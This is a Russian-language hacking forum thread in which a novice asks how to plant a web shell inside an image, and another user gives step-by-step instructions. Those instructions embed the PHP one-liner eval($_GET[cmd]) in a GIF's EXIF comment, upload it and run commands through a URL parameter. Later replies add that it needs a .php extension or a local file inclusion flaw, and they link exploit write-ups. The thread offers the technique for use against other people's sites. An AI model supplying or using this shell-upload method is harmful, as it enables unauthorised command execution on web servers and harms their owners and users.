шелл в картинке

прочитал статю на античяте о заливке шела обратил внимание на етот метод чтота непонятно как ето возможно при каких условиях ето возможно заливал ктота так шелл а то неверятся...обясните новичку что и как может видео пример наидется



8.) Ну этот способ называется шелл в картинке, или exif шелл Итак, начнём:
Часто мы пытаемся загрузить наш шелл в формате .jpg и т.п но также часто попадаются файломенеджеры которые с доброй харей любезно сжимают файл да ещё и размер, и понятное дело наш шелл так не заработает, тогда воспользуемся волшебной штукой под названием exif, а делаем так:
Берём например paint, создаём картинку хоть 1x1 пикселей, сохраняем в формате .gif или как вам удобней, затем юзаем тулзы для добавления "комментария" к фотке, то есть exif, для этого например подойдёт gimp, открываем в нём наше фото, нажимаем сохранить к примеру в формате .gif и пишем там где Comment или Комментарий, или ещё чего наш код от мини шелла, то есть <?php eval($_GET[cmd]); ?>, сохраняем, льём, делаем так http://site.com/foto.gif?cmd=phpinfo(); и радуемся! также такие "комментарии" можно вставить и в hex редакторе...

 

[DEL 31]

 

похоже парень думает, что код выполняется прям из gif. нет. просто это картинка с php кодом и расширением php.

 

да не думаю я ничево гифка никогда небудет выполнятся как пхп проста метод мне не ясен

 

текст ето теория а видео ето практика хотел бы увидеть всео на практике на какие саиты ето возможно

 

где написано что раширение там пхп

 

выше ведь написано

 

Зачастую эта уязвимость эксплуатируется в комплексе с еще одной - LFI. В соло она не работает.

 

https://packetstormsecurity.com/files/103828/FCKeditor-Shell-Upload.html
http://hackers2devnull.blogspot.co.uk/2013/05/how-to-shell-server-via-image-upload.html
http://marcoramilli.blogspot.ru/2014/01/hacking-through-image-gif-turn.html